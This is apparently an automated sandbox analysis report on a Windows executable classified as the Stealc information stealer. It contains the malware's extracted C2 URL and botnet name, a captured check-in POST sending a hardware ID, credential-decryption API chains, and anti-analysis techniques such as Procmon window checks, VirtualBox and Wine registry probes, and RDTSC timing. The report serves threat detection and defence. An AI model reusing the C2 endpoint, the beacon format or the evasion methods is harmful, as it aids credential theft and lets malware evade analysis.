Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1528602
MD5: dcbcbb7abc2724683097cb469b37c429
SHA1: 785d9b8ecba52caae4fb1bec9761d5bb1cbff066
SHA256: d9efe6204be6eab5b04dc98ad054b27df5661cba2a11bc508ee27711686eb918
Tags: exe user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6392 cmdline: "C:\Users\user\Desktop\file.exe" MD5: DCBCBB7ABC2724683097CB469B37C429)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (Source | Rule | Description | Author | Strings):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1689272998.0000000004D60000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1730462584.000000000106E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 6392 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 6392 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.3b0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Sigma: No Sigma rule has matched

Suricata alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2024-10-08T04:12:02.369390+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP

                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.3b0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 0_2_003BC820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_003B7240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_003B9AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B9B60 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_003B9B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_003C8EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_003C38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_003C4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_003BDA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_003BE430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_003BED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_003C4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_003BDE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_003BBE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_003BF6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_003C3EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_003B16D0

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 34 32 35 35 33 46 35 31 36 34 34 30 32 32 33 39 31 37 38 38 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="hwid"D242553F51644022391788------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="build"doma------CBGCAFIIECBFIDHIJKFB--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_003B4880
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 34 32 35 35 33 46 35 31 36 34 34 30 32 32 33 39 31 37 38 38 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="hwid"D242553F51644022391788------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="build"doma------CBGCAFIIECBFIDHIJKFB--
Source: file.exe, 00000000.00000002.1730462584.000000000106E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1730462584.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1730462584.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1730462584.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php0
Source: file.exe, 00000000.00000002.1730462584.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpA
Source: file.exe, 00000000.00000002.1730462584.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpl
Source: file.exe, 00000000.00000002.1730462584.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.1730462584.000000000106E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37s

                System Summary

Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DB053
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0074017E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0077DA30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00779AE6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0077EAA2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00774A97
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00889BA9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00856BC3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00824CE7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006834CB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00780536
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0077B51E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E3E43
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0066D624
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0073AFF0
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 003B45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: gwvifbyy ZLIB complexity 0.9949278137604716
Source: file.exe, 00000000.00000003.1689272998.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_003C9600
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 0_2_003C3720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UZWAMF40.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1806336 > 1048576
Source: file.exe | Static PE information: Raw size of gwvifbyy is bigger than: 0x100000 < 0x192e00

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.3b0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;gwvifbyy:EW;nlwliywy:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;gwvifbyy:EW;nlwliywy:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C9860 GetProcAddress (x21),LoadLibraryA (x5),GetProcAddress (x7), 0_2_003C9860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c40e6 should be: 0x1bbeff
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: gwvifbyy
Source: file.exe | Static PE information: section name: nlwliywy
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081B889 push esi; mov dword ptr [esp], edi 0_2_0081B8C9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081B889 push eax; mov dword ptr [esp], ecx 0_2_0081B8E8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003CB035 push ecx; ret 0_2_003CB048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0078705C push 4AF26E12h; mov dword ptr [esp], ebp 0_2_007870A1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DB053 push ebx; mov dword ptr [esp], eax 0_2_006DB05D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DB053 push 3E37D5F5h; mov dword ptr [esp], esi 0_2_006DB097
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DB053 push edi; mov dword ptr [esp], ebp 0_2_006DB109
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DB053 push 117418E4h; mov dword ptr [esp], edx 0_2_006DB114
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DB053 push 2D5EBB59h; mov dword ptr [esp], ecx 0_2_006DB121
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DB053 push ecx; mov dword ptr [esp], ebp 0_2_006DB125
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DB053 push 288B5101h; mov dword ptr [esp], esi 0_2_006DB14C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DB053 push 0FCA01B2h; mov dword ptr [esp], ebp 0_2_006DB1A5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DB053 push 5A62476Ah; mov dword ptr [esp], eax 0_2_006DB26A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00630825 push ebp; mov dword ptr [esp], 1A21AB9Bh 0_2_0063087B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00630825 push ebp; mov dword ptr [esp], eax 0_2_0063092A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00630825 push ecx; mov dword ptr [esp], 12930B00h 0_2_0063097A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007AC013 push 050F09E2h; mov dword ptr [esp], edi 0_2_007AC03C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008330F7 push esi; mov dword ptr [esp], esp 0_2_00833183
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0080A038 push eax; mov dword ptr [esp], 3F7C1A7Eh 0_2_0080A065
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0080A038 push eax; mov dword ptr [esp], ebp 0_2_0080A0D6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0080A038 push 7355BA91h; mov dword ptr [esp], ecx 0_2_0080A0F9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0080A038 push 5BE0ED00h; mov dword ptr [esp], ebx 0_2_0080A125
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007AA0C7 push edi; mov dword ptr [esp], ebx 0_2_007AA121
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A28A7 push ebp; mov dword ptr [esp], ebx 0_2_007A28CA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A28A7 push ecx; mov dword ptr [esp], eax 0_2_007A28F7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0085B861 push ebp; mov dword ptr [esp], ebx 0_2_0085B875
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0085B861 push ecx; mov dword ptr [esp], 796DEDBBh 0_2_0085B8B6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007FB889 push ecx; mov dword ptr [esp], eax 0_2_007FB8B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A0082 push edi; mov dword ptr [esp], edx 0_2_007A0010
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0074017E push ebx; mov dword ptr [esp], ecx 0_2_007401B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082A9AC push ebx; mov dword ptr [esp], esi 0_2_0082A9E1
Source: file.exe | Static PE information: section name: gwvifbyy entropy: 7.95408378221177

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-13548
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 611A47 second address: 611A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 786B24 second address: 786B48 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F76A53B3876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F76A53B3876h 0x00000012 jmp 00007F76A53B3882h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 786DF9 second address: 786E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76A5412C0Bh 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 786E0E second address: 786E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76A53B3889h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78727C second address: 78729A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pushad 0x0000000a jne 00007F76A5412C0Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F76A5412C06h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 788E2B second address: 788E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jmp 00007F76A53B387Ch 0x00000016 jmp 00007F76A53B3884h 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 push esi 0x00000022 pop esi 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 788E64 second address: 611A47 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007F76A5412C13h 0x00000010 pop eax 0x00000011 call 00007F76A5412C0Bh 0x00000016 mov dword ptr [ebp+122D1EB4h], ecx 0x0000001c pop edi 0x0000001d push dword ptr [ebp+122D03B5h] 0x00000023 or edx, dword ptr [ebp+122D2998h] 0x00000029 call dword ptr [ebp+122D36CCh] 0x0000002f pushad 0x00000030 ja 00007F76A5412C1Ch 0x00000036 xor eax, eax 0x00000038 mov dword ptr [ebp+122D23A0h], ebx 0x0000003e mov edx, dword ptr [esp+28h] 0x00000042 cld 0x00000043 mov dword ptr [ebp+122D2CC0h], eax 0x00000049 pushad 0x0000004a jmp 00007F76A5412C12h 0x0000004f popad 0x00000050 mov esi, 0000003Ch 0x00000055 mov dword ptr [ebp+122D1FBEh], ecx 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f mov dword ptr [ebp+122D1EA0h], eax 0x00000065 jnc 00007F76A5412C11h 0x0000006b lodsw 0x0000006d clc 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 cld 0x00000073 mov ebx, dword ptr [esp+24h] 0x00000077 pushad 0x00000078 mov esi, 33349F84h 0x0000007d xor dword ptr [ebp+122D1EA0h], edx 0x00000083 popad 0x00000084 push eax 0x00000085 pushad 0x00000086 push eax 0x00000087 push edx 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 788F20 second address: 788F3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A53B3889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 788F3D second address: 788F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 788F43 second address: 788F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 788F47 second address: 788F4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 788F4B second address: 788F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F76A53B3878h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 788F5F second address: 788F64 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 788F64 second address: 788F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F76A53B3880h 0x00000013 rdtsc
